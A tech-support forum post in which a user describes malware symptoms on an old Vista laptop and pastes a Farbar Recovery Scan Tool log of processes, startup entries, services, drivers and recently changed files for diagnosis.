Post Artemis - Permissions & Other Problems


  • This topic is locked
69 replies to this topic

#1 vistanovice

Posted 02 August 2016 - 11:43 AM

I ran Kaspersky about 5 days ago and it identified Artemis as a virus. I think it is removed but am not sure. I also ran Combofix on advice elsewhere on the internet. Lots of trojans. Again, I think they were quarantined or deleted but...

Still have problems - more problems!

First, I cannot get permission to work with files (mostly images) on my back-up F drive. No permission. This is new.

I also think the system is messed up - sorry I'm not more technical. But I cannot seem to log in as the owner. BTW this is a used laptop given to me after my ASUS was killed online. I only use Firefox & have tried to remove IE but see it's still there with loads of bad files!

I can no longer play videos or watch livestream online. No trouble prior to this mess.

Firefox stops responding on certain sites (Twitter mostly) and my computer memory fills to 100%.

Just everything is wanky.

Here are the FRST logs. Thank you so much for your help. I've run out of computers & need this badly to make money.

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-07-2016
Ran by Scott (administrator) on 45TH (02-08-2016 12:06:57)
Running from C:\Users\Scott\Downloads
Loaded Profiles: Scott (Available Profiles: Scott)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) Language: English (United States)
Internet Explorer Version 7 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Agere Systems) C:\Windows\System32\agrsmsvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Acer Inc.) C:\Program Files\Common Files\Logitech\LComMgr\Communications_Helper.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Acer Inc.) C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Acer Inc.) C:\Acer\Empowering Technology\eNet\eNet Service.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(McAfee, Inc.) C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
() C:\Acer\Mobility Center\MobilityService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Acer Inc.) C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
() C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(acer) C:\Acer\Empowering Technology\ePower\ePowerSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(McAfee, Inc.) C:\Program Files\McAfee\SiteAdvisor\saUI.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [3784704 2006-11-09] (Realtek Semiconductor)
HKLM\...\Run: [LogitechCommunicationsManager] => C:\Program Files\Common Files\Logitech\LComMgr\Communications_Helper.exe [304664 2006-10-31] (Acer Inc.)
HKLM\...\Run: [Acer Assist Launcher] => C:\Program Files\Acer Assist\launcher.exe [1261568 2006-12-07] ()
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM\...\Run: [Eraser] => C:\Program Files\Eraser\Eraser.exe [1074112 2015-10-15] (The Eraser Project)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [562688 2015-02-11] (McAfee, Inc.)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [6851288 2016-07-13] (Piriform Ltd)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [ISUSPM Startup] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [249856 2005-08-11] (Macrovision Corporation)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-19] (Microsoft Corporation)
AppInit_DLLs: C:\Windows\System32\eNetHook.dll => C:\Windows\System32\eNetHook.dll [90112 2006-12-28] (acer)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * sasnative32
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0B445639-B454-43BF-A2FB-49D9E835E9DB}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{67B129A9-08A7-498B-A699-72217FD81C36}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{6BF2A6AC-91B3-4434-886D-03542BCADFD6}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKLM - (No Name) - {f0e98552-8e47-4c6c-9b3a-11ab0549f94d} -  No File
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Toolbar: HKLM - No Name - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} -  No File
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Toolbar: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2016-02-12] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll [2015-03-03] (McAfee, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988
FF Homepage: hxxp://k2b-bulk.ebay.com/ws/eBayISAPI.dll?ListingConsole&currentPage=LCActive
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-08-01] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1215155.dll [2014-12-10] (Adobe Systems, Inc.)
FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files\Free Ride Games\npExentCtl.dll [No File]
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-03-03] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin: www.exent.com/GameTreatWidget -> C:\Program Files\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\Ask.xml [2014-12-25]
FF Extension: McAfee WebAdvisor - C:\Program Files\McAfee\SiteAdvisor\saffplg.xpi [2016-07-29]
FF Extension: AddThis - C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\{3e0e7d2a-070f-4a47-b019-91fe5385ba79} [2016-08-01]
FF Extension: LastPass - C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\support@lastpass.com [2016-08-01]
FF Extension: BetterPrivacy - C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-08-01]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-02] [not signed]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor\saffplg.xpi

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [aaaaafeopjhkcolncjbedbhofpocmdbn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [aaaaaikjhckghnoaaaehhmgjcfajoabi] - C:\Users\Scott\AppData\Local\imeshjzipmusictoolbar\GC\toolbar.crx [2014-07-09]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2016-02-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 eLockService; C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe [24576 2006-12-22] (Acer Inc.) [File not signed]
R2 eNet Service; C:\Acer\Empowering Technology\eNet\eNet Service.exe [126976 2006-12-28] (Acer Inc.) [File not signed]
R2 eRecoveryService; C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe [49152 2006-12-28] (Acer Inc.) [File not signed]
R2 eSettingsService; C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe [24576 2007-01-02] () [File not signed]
R2 EvtEng; C:\Program Files\Intel\WiFi\bin\EvtEng.exe [860160 2008-10-16] (Intel® Corporation) [File not signed]
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R2 LightScribeService; c:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
R2 McAfee SiteAdvisor Service; c:\Program Files\McAfee\SiteAdvisor\McSACore.exe [132160 2016-02-12] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [690408 2015-03-03] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [476680 2015-02-27] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [291816 2015-02-11] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [196600 2015-02-17] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [334576 2015-02-24] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [238288 2015-02-17] (McAfee, Inc.)
R2 MobilityService; C:\Acer\Mobility Center\MobilityService.exe [107008 2006-11-24] () [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [43520 2006-11-08] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53248 2006-11-08] (Hewlett-Packard) [File not signed]
R2 RegSrvc; C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe [466944 2008-10-16] (Intel® Corporation) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-19] (Microsoft Corporation)
R2 WMIService; C:\Acer\Empowering Technology\ePower\ePowerSvc.exe [135168 2007-01-02] (acer) [File not signed]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 45F8A0B2; C:\Windows\System32\drivers\45F8A0B2.sys [153784 2016-07-29] (Kaspersky Lab ZAO)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [61848 2015-02-17] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
R2 int15; C:\Acer\Empowering Technology\eRecovery\int15.sys [76584 2006-12-07] ()
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [304928 2015-02-17] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [260248 2015-02-17] (McAfee, Inc.)
R0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [82800 2015-02-17] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [371648 2015-02-17] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [648552 2015-02-17] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [380496 2015-01-16] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [80760 2015-01-16] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [217584 2015-02-17] (McAfee, Inc.)
R3 NTIDrvr; C:\Windows\System32\DRIVERS\NTIDrvr.sys [6144 2006-12-05] (NewTech Infosystems, Inc.) [File not signed]
S3 ADASPROT; \??\C:\Program Files\Advanced System Optimizer 3\adasprot32.sys [X]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-19] (Microsoft Corporation)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 catchme; \??\C:\Users\Scott\AppData\Local\Temp\catchme.sys [X]
S3 EraserUtilDrv11010; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11010.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lv321av; system32\DRIVERS\lv321av.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-02 12:06 - 2016-08-02 12:08 - 00018121 _____ C:\Users\Scott\Downloads\FRST.txt
2016-08-02 12:05 - 2016-08-02 12:06 - 00000000 ____D C:\FRST
2016-08-02 12:04 - 2016-08-02 12:05 - 01744384 _____ (Farbar) C:\Users\Scott\Downloads\FRST.exe
2016-08-02 11:47 - 2016-08-02 11:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-08-01 21:36 - 2016-08-01 21:36 - 00000529 _____ C:\Users\Scott\Downloads\WindowsMediaPlayerConfiguration.diagcab
2016-08-01 21:35 - 2016-08-01 21:35 - 00000438 _____ C:\Users\Scott\Downloads\videodiagnostic10.diagcab
2016-08-01 12:16 - 2016-08-01 12:16 - 00000000 ___SD C:\ComboFix
2016-07-31 04:28 - 2016-08-01 15:46 - 01025448 _____ C:\Windows\ntbtlog.txt
2016-07-31 04:26 - 2016-07-31 04:04 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts.20160731-042604.backup
2016-07-31 04:08 - 2016-07-31 04:08 - 00013592 _____ C:\ComboFix.txt
2016-07-31 03:39 - 2016-07-31 03:41 - 00003626 _____ C:\Users\Scott\Desktop\Rkill.txt
2016-07-31 03:24 - 2016-07-31 03:24 - 00025490 _____ C:\Users\Scott\Desktop\Remove.odt
2016-07-31 02:47 - 2016-07-31 02:47 - 00000000 ____D C:\ProgramData\Avg
2016-07-31 02:46 - 2016-07-31 02:46 - 03143504 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Scott\Downloads\AVG_Protection_Free_1606.exe
2016-07-30 19:52 - 2016-07-30 19:53 - 101581200 _____ (Kaspersky Lab ZAO) C:\Users\Scott\Downloads\KVRT(1).exe
2016-07-29 15:30 - 2016-07-29 15:48 - 00000000 ____D C:\KVRT_Data
2016-07-29 15:30 - 2016-07-29 15:30 - 00153784 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\45F8A0B2.sys
2016-07-29 15:09 - 2016-06-07 11:34 - 00434176 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-07-29 15:09 - 2016-06-07 11:33 - 00516096 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-07-29 15:05 - 2016-07-29 15:06 - 100528016 _____ (Kaspersky Lab ZAO) C:\Users\Scott\Downloads\KVRT.exe
2016-07-29 13:49 - 2015-12-10 17:08 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-07-29 13:49 - 2015-12-10 17:08 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-07-29 13:49 - 2015-12-10 17:08 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 06122496 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 03641344 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-07-29 13:49 - 2015-12-10 17:07 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-07-29 13:49 - 2015-12-10 17:07 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-07-29 13:49 - 2015-12-10 17:06 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2016-07-29 13:49 - 2015-12-10 15:42 - 00390144 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-07-29 13:49 - 2015-12-10 15:36 - 00026624 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-07-29 13:49 - 2015-12-10 15:35 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-07-29 10:50 - 2016-07-29 10:51 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Scott\Downloads\uSeRiNiT.exe
2016-07-29 10:25 - 2013-09-23 13:48 - 00147912 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2016-07-29 10:22 - 2016-07-29 10:22 - 00000000 ____D C:\Program Files\McAfee.com
2016-07-29 10:21 - 2016-08-02 10:52 - 00000000 ____D C:\Program Files\McAfee
2016-07-29 10:14 - 2016-07-29 10:14 - 05659746 ____R (Swearware) C:\Users\Scott\Downloads\ComboFix.exe
2016-07-29 10:03 - 2015-02-17 14:50 - 00238288 _____ (McAfee, Inc.) C:\Windows\system32\mfevtps.exe
2016-07-29 08:56 - 2016-07-29 08:59 - 00000000 ____D C:\Program Files\stinger
2016-07-29 08:51 - 2016-07-29 08:51 - 07708304 _____ (McAfee, Inc.) C:\Users\Scott\Downloads\Setup_serial_CwDqKrH4MqJL8AEPKpNBNw2_key.exe
2016-07-29 05:14 - 2016-07-29 05:14 - 00453031 ____R C:\Windows\system32\Drivers\etc\hosts.20160729-051440.backup
2016-07-22 07:26 - 2016-07-22 07:25 - 00453031 ____R C:\Windows\system32\Drivers\etc\hosts.20160722-072613.backup
2016-07-19 06:41 - 2016-07-19 06:40 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160719-064124.backup
2016-07-14 07:15 - 2016-07-14 07:14 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160714-071526.backup
2016-07-14 03:23 - 2016-06-10 10:19 - 02071040 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-07-14 03:22 - 2016-06-25 11:37 - 00626176 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-07-14 03:22 - 2016-06-25 11:37 - 00443904 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-07-14 03:22 - 2016-06-25 11:37 - 00216064 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-07-14 03:22 - 2016-06-25 11:37 - 00122880 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-07-14 03:22 - 2016-06-25 10:40 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-07-10 04:31 - 2016-07-10 05:11 - 00000000 ____D C:\Program Files\Avira
2016-07-10 04:31 - 2016-07-10 05:04 - 00000000 ____D C:\ProgramData\Avira
2016-07-10 04:12 - 2016-07-10 04:12 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160710-041256.backup
2016-07-10 03:47 - 2016-07-10 03:47 - 00000462 _____ C:\Users\Scott\Desktop\BLOG - Shortcut.lnk
2016-07-09 09:11 - 2016-07-09 09:11 - 00000000 ____D C:\Users\Scott\AppData\Roaming\0a30ba
2016-07-04 03:43 - 2016-07-04 03:43 - 00000534 _____ C:\Users\Scott\Downloads\MaintenanceDiagnostic.diagcab

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-02 12:04 - 2016-03-30 20:14 - 00000000 ____D C:\Users\Scott\AppData\LocalLow\LastPass
2016-08-02 11:43 - 2016-03-30 21:15 - 00000644 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2016-08-02 11:42 - 2006-11-02 09:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-08-02 11:42 - 2006-11-02 08:47 - 00003168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-08-02 11:42 - 2006-11-02 08:47 - 00003168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-08-02 11:40 - 2006-11-02 09:01 - 00032546 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-08-02 11:09 - 2016-04-05 20:48 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
